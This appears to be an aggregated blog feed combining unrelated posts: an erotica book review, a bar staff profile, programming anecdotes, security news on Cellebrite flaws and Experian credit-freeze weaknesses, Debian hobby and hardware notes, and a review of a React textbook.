I was of two minds about reviewing this. Erotica is tricky to review, since to an extent it's not trying to do what most books are doing. The point is less to tell a coherent story (although that can be a bonus) than it is to turn the reader on, and what turns the reader on is absurdly personal and unpredictable. Erotica is arguably more usefully marked with story codes (which in this case would be something like MF, MMFF, FF, Mdom, Fdom, bd, ds, rom, cons, exhib, humil, tattoos) so that the reader has an idea whether the scenarios in the story are the sort of thing they find hot.

This is particularly true of BDSM erotica, since the point is arousal from situations that wouldn't work or might be downright horrifying in a different sort of book. Often the forbidden or taboo nature of the scene is why it's erotic. For example, in another genre I would complain about the exaggerated and quite sexist gender roles, where all the men are hulking cage fighters who want to control the women, but in male-dominant BDSM erotica that's literally the point.

As you can tell, I wrote a review anyway, primarily because of how I came to read this book. Kit Rocha (which is a pseudonym for the writing team of Donna Herren and Bree Bridges) recently published Deal with the Devil, a book about mercenary librarians in a post-apocalyptic future. Like every right-thinking person, I immediately wanted to read a book about mercenary librarians, but discovered that it was set in an existing universe. I hate not starting at the beginning of things, so even though there was probably no need to read the earlier books first, I figured out Beyond Shame was the first in this universe and the bundle of the first three books was only $2.

If any of you are immediately hooked by mercenary librarians but are back-story completionists, now you know what you'll be getting into.

That said, there are a few notable things about this book other than it has a lot of sex. The pivot of the romantic relationship was more interesting and subtle than most erotica. Noelle desperately wants a man to do all sorts of forbidden things to her, but she starts the book unable to explain or analyze why she wants what she wants, and both Jasper and the story are uncomfortable with that and unwilling to leave it alone. Noelle builds up a more coherent theory of herself over the course of the book, and while it's one that's obviously designed to enable lots of erotic scenes, it's not a bad bit of character development.

Even better is Lex, the partner (sort of) of the leader of the O'Kane gang and by far the best character in the book. She takes Noelle under her wing from the start, and while that relationship is sexualized like nearly everything in this book, it also turns into an interesting female friendship that I would have also enjoyed in a different genre. I liked Lex a lot, and the fact she's the protagonist of the next book might keep me reading.

Beyond Shame also has a lot more female gaze descriptions of the men than is often the case in male-dominant BDSM. The eye candy is fairly evenly distributed, although the gender roles are very much not. It even passes the Bechdel test, although it is still erotica and nearly all the conversations end up being about sex partners or sex eventually.

I was less fond of the fact that the men are all dangerous and violent and the O'Kane leader frequently acts like a controlling, abusive psychopath. A lot of that was probably the BDSM setup, but it was not my thing. Be warned that this is the sort of book in which one of the (arguably) good guys tortures someone to death (albeit off camera).

Recommendations are next to impossible for erotica, so I won't try to give one. If you want to read the mercenary librarian novel and are dubious about this one, it sounds like (although I can't confirm) that it's a bit more on the romance end of things and involves a lot fewer group orgies. Having read this book, I suspect it was entirely unnecessary to have done so for back-story. If you are looking for male-dominant BDSM, Beyond Shame is competently written, has a more thoughtful story than most, and has a female friendship that I fully enjoyed, which may raise it above the pack.

Rating: 6 out of 10


LongNowMeet Ty Caudle, The Interval’s New Beverage Director

Long Now is pleased to announce that longtime Interval bartender Ty Caudle will become The Interval’s next Beverage Director. He takes the reins from Todd Carnam, who has moved to Washington, D.C. after a creative three-year run at the helm. 

“We are very excited and grateful to have Ty in such a strong position to make this transition both seamless and inspired,” says Alexander Rose, Long Now’s Executive Director and Founder of The Interval. 

Caudle’s bartending career began at a small backyard party in San Francisco. He was working as a caterer for the event, and when the bartender failed to show, he was thrust into the role despite having zero experience.

“We had no idea what we were doing,” he says, “but there was definitely an energy to bartending that wasn’t otherwise present in catering.”

After a friend gifted him a copy of Imbibe! by David Wondrich, Caudle knew he’d found his calling.

“The book opened up a world that I otherwise would’ve never known,” he says. “It traced the history of forgotten ingredients and techniques, painted a rich tapestry of the world of bartending in the 01800s, and most importantly taught me that tending bar was a legitimate profession, one to be studied and practiced.”

Ty Caudle at The Interval. 

And so he did. Caudle devoured every bartending book he could find, bought esoteric cocktail ingredients, and experimented at home. He visited distilleries in Kentucky, Tequila, Oaxaca, Ireland, and Copenhagen to learn more about how different cultures approached spirit production.

“Those trips cemented my deep respect for the craft and history of distillation,” he says. “Whether on a tropical hillside under a tin roof or in a cacophonous bustling factory, spirit production is one of humanity’s great achievements. As bartenders, we have a responsibility to honor those artisans’ tireless efforts with every martini or manhattan we stir.”

Breaking through in the industry during the Great Recession, however, proved challenging. Caudle eventually landed a gig prepping the bar at the now-shuttered Locanda in the Mission. This led to other bartending opportunities at a small handful of spaces in the same neighborhood as Locanda.

The Interval at Long Now.

The Interval opened its doors in 02014 with Jennifer Colliau as its Beverage Director. Colliau was something of a legend in the Bay Area’s vibrant bar scene, having founded Small Hand Foods after eight years tending bar at San Francisco’s celebrated Slanted Door restaurant.

Caudle was a big fan of Colliau’s work, and promptly responded to an ad for a part-time bartender position at The Interval.

Jennifer Colliau, The Interval’s first Beverage Director. 

“The job listing was decidedly different,” Caudle says. “It gave me a glimpse of how unique The Interval is.”

Following a promising interview with then-Bar Manager Haley Samas-Berry, Caudle returned to The Interval a few days later for a stage. Expecting to find Samas-Berry behind the bar, Caudle was mortified to find Colliau there instead. Caudle was, suffice it to say, a little intimidated:  

I walked over with my shakers and spoons and jigger, hands trembling, and she asked if I wouldn’t mind making drinks with their tools instead. I said, “Sure,” as I walked into the other room to set my things down. Inside I was completely freaking out. It took every bit of my strength to emerge from that space. I already felt in over my head and this amplified it. For the next hour or so I welcomed guests and set down menus and poured water. Every time a drink order came in Jennifer would stand over my shoulder and recite the recipe to me while correcting a litany of technical mistakes that I was making. The torture finally relented and we went upstairs and had a good conversation. But I remember leaving that night thinking there was just no way in hell I was going to get that job. 

Caudle got the job. And now, following years of excellent work, he’s got Colliau’s old job, too. 

We spoke with Caudle about his new role, his approach to cocktail creation and design, and what Interval patrons can expect once the bar fully reopens.

Your promotion to Beverage Director brings the opportunity to try new things, while also contending with a rich legacy from past Beverage Directors Jennifer Colliau and Todd Carnam. What new things are you excited to bring to the table? What do you hope to maintain from the past?

I feel uniquely positioned as I have worked in the space under the tutelage of both Jennifer and Todd. 

Jennifer set the standard and created the beverage identity of The Interval. She taught us that we can’t unknow things. To that end, I’m excited to continue the pursuit of the best version of a beverage, meticulously molding it while uncovering its rich history.

The Interval’s former Beverage Directors Jennifer Colliau and Todd Carnam

Todd is a storyteller and a curmudgeonly romantic at heart. He taught us that a drink can evoke a feeling and connect to a larger narrative, of the cocktail’s role as a totem. I hope to honor that spirit and the creativity it fosters in my approach to menu development.

Foremost, I’m excited to feature wine, beer, and spirits made by people that don’t look like me. I’m personally captivated by the fantastic complexity of what eventually winds up in a glass on the bar. Every drink is the confluence of many brilliant makers and I seek to pay respect to their efforts. I think it is easy for us to forget that alcohol is an agricultural product. It started as a plant in the ground in a corner of the world and so many things had to go right for it to find its way to us. I hope to imbue our staff with a passion for the process of making these delicious products and to craft drinks that honor them.

A trio of selections from The Interval’s Old Fashioned menu.

What’s your approach to cocktail design and creation?

I can be somewhat reluctant to design new drinks. The cocktail world has such a rich history and so many people have contributed across generations. With that in mind, I often find myself focusing on making the very best version of a beverage that we know well or that may have been overlooked. 

It tends to take me a long time to mold a bigger picture of what the theme of a cocktail or a menu should be. Once I have that in place I get excited to uncover pieces that fit into the whole. Our Tiki Not Tiki menu is a great example. After we established that template, I found myself scouring cocktail books and menus for tropical drinks that didn’t fit into the Tiki canon. Each discovery was a revelation, a spark to continue forth.

Mai Tai from The Interval’s Tiki Not Tiki menu. 

What’s one of the most challenging cocktails for The Interval to make? 

Generally, we like to do as much work behind the scenes preparing ingredients and putting things together ahead of time to ensure cocktails get to guests quickly.

The Interval’s take on the Kalimotxo.

I will say that one of our biggest challenges in development came with the Kalimotxo. This simple Spanish blend of Coca Cola and box wine was incredibly difficult to replicate. For starters, it was extremely trying to imitate the singular flavor of coke, eventually replacing its woodsy vanilla with Carpano Antica and its baking spice notes with lots of Angostura. Harder still was finding a red wine that didn’t overpower the rest of the ingredients. In the end, we wound up bringing in an entirely new wine outside of our offerings just to get the final flavor profile we were looking for.

Everyone has different tastes, but what would you recommend as a cocktail for a first-timer to the Interval to highlight what distinguishes the establishment from other cocktail bars?

The Interval’s Navy Gimlet.

The Navy Gimlet perfectly encapsulates what we strive for at The Interval. With the time involved to infuse navy strength gin with lime oil and to slowly filter the finished product, its preparation takes days but arrives to the guest in no time at all. The gimlet has been maligned for decades as a result of artificial ingredients and certain preparations and we’ve done our very best to correct those deficiencies. We make a delicious lime cordial and stir (rather than shake) our pearlescent iteration. It’s a drink with a history, deceptively simple and infinitely refreshing.

A busy evening at The Interval, May 02016. 

What do you think is the biggest misconception people have about tending bar?

I think the physical act of bartending is unnecessarily heralded in the public eye. Anyone can mix drinks. Sure, there are hundreds of classics to memorize and plenty of muscle memory to establish, but that side of tending bar is overwhelmingly a teachable skill.

The component that cannot be taught as easily is hospitality. There is a degree of empathy and emotional availability necessary to do this work that isn’t required in many other professions. Bartenders absorb the energy of every guest that sits in front of them and a genuine desire to serve is essential to providing a superior guest experience. This comes naturally to some and can be a lifelong pursuit for others. Putting aside the day thus far and being truly hospitable behind the bar is the goal we spend our careers striving for. 

For the latest on opening hours, placing to-go orders, and events, head to The Interval’s website, or follow The Interval on Instagram, Twitter, and Facebook.

Worse Than FailureCodeSOD: Absolute Mockery

At a certain point, it becomes difficult to write a unit test without also being able to provide mocked implementations of some of the code. But mocking well is its own art- it's easy to fall into the trap of writing overly complex mocks, or mocking the wrong piece of functionality, and ending up in situations where your tests end up spending more time testing their mocks than your actual code.

Was Rhonda's predecessor thinking of any of those things when writing code? Were they aware of the challenges of writing useful mocks, of managing dependency injection? Or was this Java solution the best they could come up with:

public class Person { private int age; private String name; public int getAge() { if (Testing.isTest) return 27; else return age; } public String getName() { if (Testing.isTest) return "John Smith"; else return name; } // and so on .. }

Every method was written like this. Every method. Each method contained its own mockery, and in turn, made a mockery of test-driven-development.

[Advertisement] ProGet’s got you covered with security and access controls on your NuGet feeds. Learn more.

Cryptogram Security Vulnerabilities in Cellebrite

Moxie Marlinspike has an intriguing blog post about Cellebrite, a tool used by police and others to break into smartphones. Moxie got his hands on one of the devices, which seems to be a pair of Windows software packages and a whole lot of connecting cables.

According to Moxie, the software is riddled with vulnerabilities. (The one example he gives is that it uses FFmpeg DLLs from 2012, and have not been patched with the 100+ security updates since then.)

…we found that it’s possible to execute arbitrary code on a Cellebrite machine simply by including a specially formatted but otherwise innocuous file in any app on a device that is subsequently plugged into Cellebrite and scanned. There are virtually no limits on the code that can be executed.

This means that Cellebrite has one — or many — remote code execution bugs, and that a specially designed file on the target phone can infect Cellebrite.

For example, by including a specially formatted but otherwise innocuous file in an app on a device that is then scanned by Cellebrite, it’s possible to execute code that modifies not just the Cellebrite report being created in that scan, but also all previous and future generated Cellebrite reports from all previously scanned devices and all future scanned devices in any arbitrary way (inserting or removing text, email, photos, contacts, files, or any other data), with no detectable timestamp changes or checksum failures. This could even be done at random, and would seriously call the data integrity of Cellebrite’s reports into question.

That malicious file could, for example, insert fabricated evidence or subtly alter the evidence it copies from a phone. It could even write that fabricated/altered evidence back to the phone so that from then on, even an uncorrupted version of Cellebrite will find the altered evidence on that phone.

Finally, Moxie suggests that future versions of Signal will include such a file, sometimes:

Files will only be returned for accounts that have been active installs for some time already, and only probabilistically in low percentages based on phone number sharding.

The idea, of course, is that a defendant facing Cellebrite evidence in court can claim that the evidence is tainted.

I have no idea how effective this would be in court. Or whether this runs foul of the Computer Fraud and Abuse Act in the US. (Is it okay to booby-trap your phone?) A colleague from the UK says that this would not be legal to do under the Computer Misuse Act, although it’s hard to blame the phone owner if he doesn’t even know it’s happening.


Krebs on SecurityExperian’s Credit Freeze Security is Still a Joke

In 2017, KrebsOnSecurity showed how easy it is for identity thieves to undo a consumer’s request to freeze their credit file at Experian, one of the big three consumer credit bureaus in the United States.  Last week, KrebsOnSecurity heard from a reader who had his freeze thawed without authorization through Experian’s website, and it reminded me of how truly broken authentication and security remains in the credit bureau space.

Experian’s page for retrieving someone’s credit freeze PIN requires little more information than has already been leaked by big-three bureau Equifax and a myriad other breaches.

Dune Thomas is a software engineer from Sacramento, Calif. who put a freeze on his credit files last year at Experian, Equifax and TransUnion after thieves tried to open multiple new payment accounts in his name using an address in Washington state that was tied to a vacant home for sale.

But the crooks were persistent: Earlier this month, someone unfroze Thomas’ account at Experian and promptly applied for new lines of credit in his name, again using the same Washington street address. Thomas said he only learned about the activity because he’d taken advantage of a free credit monitoring service offered by his credit card company.

Thomas said after several days on the phone with Experian, a company representative acknowledged that someone had used the “request your PIN” feature on Experian’s site to obtain his PIN and then unfreeze his file.

Thomas said he and a friend both walked through the process of recovering their freeze PIN at Experian, and were surprised to find that just one of the five multiple-guess questions they were asked after entering their address, Social Security Number and date of birth had anything to do with information only the credit bureau might know.

KrebsOnSecurity stepped through the same process and found similar results. The first question asked about a new mortgage I supposedly took out in 2019 (I didn’t), and the answer was none of the above. The answer to the second question also was none of the above.

The next two questions were useless for authentication purposes because they’d already been asked and answered; one was “which of the following is the last four digits of your SSN,” and the other was “I was born within a year or on the year of the date below.” Only one question mattered and was relevant to my credit history (it concerned the last four digits of a checking account number).

The best part about this lax authentication process is that one can enter any email address to retrieve the PIN — it doesn’t need to be tied to an existing account at Experian. Also, when the PIN is retrieved, Experian doesn’t bother notifying any other email addresses already on file for that consumer.

Finally, your basic consumer (read: free) account at Experian does not give users the option to enable any sort of multi-factor authentication that might help stymie some of these PIN retrieval attacks on credit freezes.

Unless, that is, you subscribe to Experian’s heavily-marketed and confusingly-worded “CreditLock” service, which charges between $14.99 and $24.99 a month for the ability to “lock and unlock your file easily and quickly, without delaying the application process.” CreditLock users can both enable multifactor authentication and get alerts when someone tries to access their account.

Thomas said he’s furious that Experian only provides added account security for consumers who pay for monthly plans.

“Experian had the ability to give people way better protection through added authentication of some kind, but instead they don’t because they can charge $25 a month for it,” Thomas said. “They’re allowing this huge security gap so they can make a profit. And this has been going on for at least four years.”

Experian has not yet responded to requests for comment.

When a consumer with a freeze logs in to Experian’s site, they are immediately directed to a message for one of Experian’s paid services, such as its CreditLock service. The message I saw upon logging in confirmed that while I had a freeze in place with Experian, my current “protection level” was “low” because my credit file was unlocked.

“When your file is unlocked, you’re more vulnerable to identity theft and fraud,” Experian warns, untruthfully. “You won’t see alerts if someone tries to access your file. Banks can check your file if you apply for credit or loans. Utility and service providers can see your credit file.”

Experian says my security is low because while I have a freeze in place, I haven’t bought into their questionable “lock service.”

Sounds scary, right? The thing is — except for the part about not seeing alerts — none of the above statement is true if you already have a freeze on your file. A security freeze essentially blocks any potential creditors from being able to view your credit file, unless you affirmatively unfreeze or thaw your file beforehand.

With a freeze in place on your credit file, ID thieves can apply for credit in your name all they want, but they will not succeed in getting new lines of credit in your name because few if any creditors will extend that credit without first being able to gauge how risky it is to loan to you (i.e., view your credit file). It is now free to freeze your credit in all U.S. states and territories.

Experian, like the other consumer credit bureaus, uses their intentionally confusing “lock” terminology to frighten consumers into paying for monthly subscription services. A key selling point for these lock services is they can be a faster way to let creditors peek at your file when you wish to apply for new credit. That may or may not be true in practice, but consider why it’s so important for Experian to get consumers to sign up for their lock programs.

The real reason is that Experian makes money every time someone makes a credit inquiry in your name, and it does not want to do anything to hinder those inquiries. Signing up for a lock service lets Experian continue selling credit report information to a variety of third parties. According to Experian’s FAQ, when locked your Experian credit file remains accessible to a host of companies, including:

-Potential employers or insurance companies

-Collection agencies acting on behalf of companies you may owe

-Companies providing pre-screened credit card offers

-Companies that have an existing credit relationship with you (this is true for frozen files also)

-Personalized offers from Experian, if you choose to receive them

It is annoying that Experian can get away with offering additional account security only to people who pay the company a hefty sum each month to sell their information. It’s also amazing that this sloppy security I wrote about back in 2017 is still just as prevalent in 2021.

But Experian is hardly alone. In 2019, I wrote about how Equifax’s new MyEquifax site made it simple for thieves to lift an existing credit freeze at Equifax and bypass the PIN if they were armed with just your name, Social Security number and birthday.

Also in 2019, identity thieves were able to get a copy of my credit report from TransUnion after successfully guessing the answers to multiple-guess questions like the ones Experian asks. I only found out after hearing from a detective in Washington state, who informed me that a copy of the report was found on a removable drive seized from a local man who was arrested on suspicion of being part of an ID theft gang.

TransUnion investigated and found it was indeed at fault for giving my credit report to ID thieves, but that on the bright side its systems blocked another fraudulent attempt at getting my report in 2020.

“In our investigation, we determined that a similar attempt to fraudulently obtain your report occurred in April 2020, and was successfully blocked by enhanced controls TransUnion has implemented since last year,” the company said. “TransUnion deploys a multi-layered security program to combat the ongoing and increasing threat of fraud, cyber-attacks and malicious activity.  In today’s dynamic threat environment, TransUnion is constantly enhancing and refining our controls to address the latest security threats, while still allowing consumers access to their information.”

For more information on credit freezes (also called a “security freezes”), how to request one, and other tips on preventing identity fraud, check out this story.

If you haven’t done so lately, it might be a good time to order a free copy of your credit report from This service entitles each consumer one free copy of their credit report annually from each of the three credit bureaus — either all at once or spread out over the year.

Planet DebianSteve Kemp: Writing a text-based adventure game for CP/M

In my previous post I wrote about how I'd been running CP/M on a Z80-based single-board computer.

I've been slowly working my way through a bunch of text-based adventure games:

  • The Hitchhiker's Guide To The Galaxy
  • Zork 1
  • Zork 2
  • Zork 3

Along the way I remembered how much fun I used to have doing this in my early teens, and decided to write my own text-based adventure.

Since I'm not a masochist I figured I'd write something with only three or four locations, and solicited facebook for ideas. Shortly afterwards a "plot" was created and I started work.

I figured that the very last thing I wanted to be doing was to be parsing text-input with Z80 assembly language, so I hacked up a simple adventure game in C. I figured if I could get the design right that would ease the eventual port to assembly.

I had the realization pretty early that using a table-driven approach would be the best way - using structures to contain the name, description, and function-pointers appropriate to each object for example. In my C implementation I have things that look like this:

{name: "generator",
 desc: "A small generator.",
 use: use_generator,
 use_carried: use_generator_carried,
 get_fn: get_generator,
 drop_fn: drop_generator},

A bit noisy, but simple enough. If an object cannot be picked up, or dropped, the corresponding entries are blank:

{name: "desk",
 desc: "",
 edesc: "The desk looks solid, but old."},

Here we see something that is special, there's no description so the item isn't displayed when you enter a room, or LOOK. Instead the edesc (extended description) is available when you type EXAMINE DESK.

Anyway over a couple of days I hacked up the C-game, then I started work porting it to Z80 assembly. The implementation changed, the easter-eggs were different, but on the whole the two things are the same.

Certainly 99% of the text was recycled across the two implementations.

Anyway in the unlikely event you've got a craving for a text-based adventure game I present to you:

Cory DoctorowNorwegian and German editions of How to Destroy Surveillance Capitalism

Thanks to groups of German- and Norwegian-speaking volunteers, there’s now a CC-licensed Norwegian and German edition of How to Destroy Surveillance Capitalism! They join the existing French edition.

Cory DoctorowHow To Destroy Surveillance Capitalism (Part 04)

This week on my podcast, part four of a serialized reading of my 2020 Onezero/Medium book How To Destroy Surveillance Capitalism, now available in paperback (you can also order signed and personalized copies from Dark Delicacies, my local bookstore).


Planet DebianVishal Gupta: Ramblings // On Sikkim and Backpacking

What I loved the most about Sikkim can’t be captured on cameras. It can’t be taped since it would be intrusive and it can’t be replicated because it’s unique and impromptu. It could be described, as I attempt to, but more importantly, it’s something that you simply have to experience to know.

Now I first heard about this from a friend who claimed he’d been offered free rides and Tropicanas by locals after finishing the Ladakh Marathon. And then I found Ronnie’s song, whose chorus goes : “Dil hai pahadi, thoda anadi. Par duniya ke maya mein phasta nahi” (My heart belongs to the mountains. Although a little childish, it doesn’t get hindered by materialism). While the song refers his life in Manali, I think this holds true for most Himalayan states.

Maybe it’s the pleasant weather, the proximity to nature, the sense of safety from Indian Army being round the corner, independence from material pleasures that aren’t available in remote areas or the absence of the pollution, commercialisation, & cutthroat-ness of cities, I don’t know, there’s just something that makes people in the mountains a lot kinder, more generous, more open and just more alive.

Sikkimese people, are honestly some of the nicest people I’ve ever met. The blend of Lepchas, Bhutias and the humility and the truthfulness Buddhism ingrains in its disciples is one that’ll make you fall in love with Sikkim (assuming the views, the snow, the fab weather and food, leave you pining for more).

As a product of Indian parenting, I’ve always been taught to be wary of the unknown and to stick to the safer, more-travelled path but to be honest, I enjoy bonding with strangers. To me, each person is a storybook waiting to be flipped open with the right questions and the further I get from home, the wilder the stories get. Besides there’s something oddly magical about two arbitrary curvilinear lines briefly running parallel until they diverge to move on to their respective paths. And I think our society has been so busy drawing lines and spreading hate that we forget that in the end, we’re all just lines on the universe’s infinite canvas. So the next time you travel, and you’re in a taxi, a hostel, a bar, a supermarket, or on a long walk to a monastery (that you’re secretly wishing is open despite a lockdown), strike up a conversation with a stranger. Small-talk can go a long way.

Header icon made by Freepik from

Worse Than FailureCodeSOD: Documentation on Your Contract

Josh's company hired a contracting firm to develop an application. This project was initially specced for just a few months of effort, but requirements changed, scope changed, members of the development team changed jobs, new ones needed to be on-boarded. It stretched on for years.

Even through all those changes, though, each new developer on the project followed the same coding standards and architectural principles as the original developers. Unfortunately, those standards were "meh, whatever, it compiled, right?"

So, no, there weren't any tests. No, the code was not particularly readable or maintainable. No, there definitely weren't any comments, at least if you ignore the lines of code that were commented out in big blocks because someone didn't trust source control.

But once the project was finished, the code was given back to Josh's team. "There you are," management said. "You support this now."

Josh and the rest of his team had objections to this. Nothing about the code met their own internal standards for quality, and certainly it wasn't up to the standards specified in the contract.

"Well, yes," management replied, "but we've exhausted the budget."

"Right, but they didn't deliver what the contract was for," the IT team replied.

"Well, yes, but it's a little late to bring that up."

"That's literally your job. We'd fire a developer who handed us this code."

Eventually, management caved on documentation. Things like "code quality" and "robust testing" weren't clearly specified in the contract, and there was too much wiggle room to say, "We robustly tested it, you didn't say automated tests." But documentation was listed in the deliverables, and was quite clearly absent. So management pushed back: "We need documentation." The contractor pushed back in turn: "We need money."

Eventually, Josh's company had to spend more money to get the documentation added to the final product. It was not a trivial sum, as it was a large piece of software, and would take a large number of billable hours to fully document.

This was the result:

/** * Program represents a Program and its attributes. */


/** * Customer represents a Customer and its attributes. */
[Advertisement] ProGet’s got you covered with security and access controls on your NuGet feeds. Learn more.


Planet DebianJunichi Uekawa: wake on lan.

wake on lan. I have not been able to get wake on lan working. I wonder if poweroff command is powering off the system too much and losing power on the ethernet too. Do I need to suspend?

Planet DebianJunichi Uekawa: Got a new machine Lenovo ThinkCenter M75s gen2, and installed Debian on it.

Got a new machine Lenovo ThinkCenter M75s gen2, and installed Debian on it. I wanted to try out the ryzen CPU. I haven't used a physical x86-64 Debian desktop machine since I threw away my Athlon 64 machine (dx5150), so that's like 15 years? Since then my main devices were macbooks and virtual machines (on GCE and Sakura) and raspberry pi. I got buster installed just fine. Finding the right keystrokes after boot was challenging because the graphical UI doesn't say anything. For BIOS set up to disable secure boot (F1 to enter set up: I wanted to play with kernel) and finding the keystroke to choose the boot disk (F10 to enter the dialog; I needed to choose the one labeled USB CD drive although I put in a USB SD card reader with installer image). The installation went fine for console, but getting X up was tricky, the support for the graphics (Renoir) part of the chip was added in kernel 5.5. Bullseye was 4.19 and I wasn't too comfortable with just updating the kernel. I ended up going for dist-upgrade to Bullseye. With Bullseye default kernel 5.10, X started without problems. So far I only tried out Emacs.

Planet DebianDominique Dumont: An improved GUI for cme and Config::Model

I’ve finally found the time to improve the GUI of my pet project: cme (aka Config::Model).

Several years ago, I stumbled on a usability problem on the GUI. Some configuration (like OpenSsh or Systemd) feature a lot of configuration parameters. Which means that the GUI displays all these parameters, so finding a specfic parameter might be challenging:

To workaround this problem, I’ve added a Filter widget in 2018 which did more or less the job, but it suffered from several bugs which made its behavior confusing.

This is now fixed. The Filter widget is now working in a more consistent way.

In the example below, I’ve typed “IdentityFile” (1) in the Filter widget to show the identityFile used for various hosts (2):

Which is quite good, but some hosts use the default identity file so no value show up in the GUI. You can then click on “hide empty value” checkbox to show only the hosts that use a specific identity file:

I hope that this new behavior of the Filter box will make this project more useful.

The improved GUI was released with Config::Model::TkUI 1.374. This new version is available on CPAN and on Debian/experimental). It will be released on Debian/unstable once the next Debian version is out.

All the best

Planet DebianSteinar H. Gunderson: JavaScript madness

Yesterday, I had the problem that while from the browser would work just fine against a given server endpoint (which I do not control), talking to the same server from Node.js would just give hangs and/or inscrutinable “7:::1” messages (which I later learned meant “handshake missing”).

To skip six hours of debugging, the server set a cookie in the initial HTTP handshake, and expected to get it back when opening a WebSocket, presumably to steer the connection to the same backend that got the handshake. (Chrome didn't show the cookie in the WS debugging, but Firefox did.) So we need to keep track of chose cookies. While still remaining on 0.9.5 (for stupid reasons). No fear, we add this incredibly elegant bit of code:

var io = require('');
// Hook into XHR to pick out the cookie when we receive it.
var my_cookie;
io.util.request = function() {
        var XMLHttpRequest = require('xmlhttprequest').XMLHttpRequest;
        var xhr = new XMLHttpRequest();
        const old_send = xhr.send;
        xhr.send = function() {
                // Add our own readyStateChange hook in front, to get the cookie if we don't have it.
                xhr.old_onreadystatechange = xhr.onreadystatechange;
                xhr.onreadystatechange = function() {
                        if (xhr.readyState == xhr.HEADERS_RECEIVED) {
                                const cookie = xhr.getResponseHeader('set-cookie');
                                if (cookie) {
                                        my_cookie = cookie[0].split(';')[0];
              , arguments);
                // Set the cookie if we have it.
                if (my_cookie) {
                        xhr.setRequestHeader("Cookie", my_cookie);
                return, arguments);
        return xhr;
// Now override the WebSockets transport to include our header.
io.Transport['websocket'] = function() {
        const query = io.util.query(this.socket.options.query);
        const WebSocket = require('ws');
        // Include our cookie.
        let options = {};
        if (my_cookie) {
                options['headers'] = { 'Cookie': my_cookie };
        this.websocket = new WebSocket(this.prepareUrl() + query, options);
        // The rest is just repeated from the existing function.
        const self = this;
        this.websocket.onopen = function () {
        this.websocket.onmessage = function (ev) {
        this.websocket.onclose = function () {
        this.websocket.onerror = function (e) {
        return this;
// And now, finally!
var socket = io.connect('', { transports: ['websocket'] });

It's a reminder that talking HTTP and executing JavaScript does not make you into a (headless) browser. And that you shouldn't let me write JavaScript. :-)

(Apologies for the lack of blank lines; evidently, they confuse Markdown.)

Planet DebianRussell Coker: Scanning with a MFC-9120CN on Bullseye

I previously wrote about getting a Brother MFC-9120CN multifunction printer/scanner to print on Linux [1]. I had also got it scanning which I didn’t blog about.

found USB scanner (vendor=0x04f9, product=0x021d) at libusb:003:002

I recently upgraded that Linux system to Debian/Testing (which will soon be released as Debian/Bullseye) and scanning broke. The command sane-find-scanner would find the USB connected scanner (with the above output), but “scanimage -L” didn’t.

It turned out that I had to edit /etc/sane.d/dll.d/hplip which had a single uncommented line of “hpaio” and replace that with “brother3” to make SANE load the driver /usr/lib64/sane/ from the brscan3 package (which Brother provided from their web site years ago).

I have the following script to do the scanning (which can run as non-root):

set -e
if [ "$1" == "" ]; then
  echo "specify output filename"
  exit 1


scanimage > $TMP
convert $TMP $1
rm $TMP

Final Note

This blog post doesn’t describe everything that needs to be done to setup a scanner, I already had part of it setup from 10 years ago. But for anyone who finds this after having trouble, /etc/sane.d/dll.d is one place you should look for important configuration (especially if sane-find-scanner works and “scanimage -L” fails). Also the Brother drivers are handy to have although I apparently had it working in the past with the hpaio driver from HP (the Brother device emulates a HP device).

Planet DebianRuss Allbery: Review: Learning React

Review: Learning React, by Alex Banks & Eve Porcello

Publisher: O'Reilly
Copyright: June 2020
ISBN: 1-4920-5172-1
Format: Trade paperback
Pages: 287

My first JavaScript project was a React frontend to a REST service. As part of that project, I read two books: JavaScript: The Definitive Guide to learn the language foundation and this book to learn the framework on top of it. This was an unintentional experiment in the ways programming books can approach the topic.

I commented in my review of JavaScript: the Definitive Guide that it takes the reference manual approach to the language. Learning React is the exact opposite. It's goal-driven, example-heavy, and has a problem and solution structure. The authors present a sample application, describe some desired new feature or deficiency in it, and then introduce the specific React technique that solves that problem. There is some rewriting of previous examples using more sophisticated techniques, but most chapters introduce new toy applications along with new parts of the React framework.

The best part of this book is its narrative momentum, so I think the authors were successful at their primary goal. The first eight chapters of the book (more on the rest of the book in a moment) feel like a whirlwind tour where one concept flows naturally into the next and one's questions while reading about one technique are often answered in the next section. I thought the authors tried too hard in places and overdid the enthusiasm, but it's very readable in a way that I think may appeal to people who normally find programming books dry. Learning React is also firm and definitive about the correct way to use React, which may appeal to readers who only want to learn the preferred way of using the framework. (For example, React class components are mentioned briefly, mostly to tell the reader not to use them, and the rest of the book only uses functional components.)

I had two major problems with this book, however. The first is that this breezy, narrative style turns out to be awful when one tries to use it as a reference. I read through most of this book with both enjoyment and curiosity, sat down to write a React component, and immediately struggled to locate the information I needed. Everything felt logically connected when I was focusing on the problems the authors introduced, but as soon as I started from my own problem, the structure of the book fell apart. I had to page through chapters to locate some nugget buried in the text, or re-read sections of the book to piece together which motivating problem my code was most similar to. It was a frustrating experience.

This may be a matter of learning style, since this is why I prefer programming books with a reference structure. But be warned that I can't recommend this book as a reference while you're programming, nor does it prepare you to use the official React documentation as a reference.

The second problem is less explicable and less defensible. I don't know what happened with O'Reilly's copy-editing for this book, but the code snippets are a train wreck. The Amazon reviews are full of people complaining about typos, syntax errors, omitted code, and glaring logical flaws, and they are entirely correct. It's so bad that I was left wondering if a very early, untested draft of the examples was somehow substituted into the book at the last minute by mistake.

I'm not the sort of person who normally types code in from a book, so I don't care about a few typos or obvious misprints as long as the general shape is correct. The general shape was not correct. In a few places, the code is so completely wrong and incomplete that even combined with the surrounding text I was unable to figure out what it was supposed to be. It's possible this is fixed in a later printing (I read the June 2020 printing of the second edition), but otherwise beware. The authors do include a link to a GitHub repository of the code samples, which are significantly different than what's printed in the book, but that repository is incomplete; many of the later chapter examples are only links to JavaScript web sandboxes, which bodes poorly for the longevity of the example code.

And then there's chapter nine of this book, which I found entirely baffling. This is a direct quote from the start of the chapter:

This is the least important chapter in this book. At least, that's what we've been told by the React team. They didn't specifically say, "this is the least important chapter, don't write it." They've only issued a series of tweets warning educators and evangelists that much of their work in this area will very soon be outdated. All of this will change.

This chapter is on suspense and error boundaries, with a brief mention of Fiber. I have no idea what I'm supposed to do with this material as a reader who is new to React (and thus presumably the target audience). Should I use this feature? When? Why is this material in the book at all when it's so laden with weird stream-of-consciousness disclaimers? It's a thoroughly odd editorial choice.

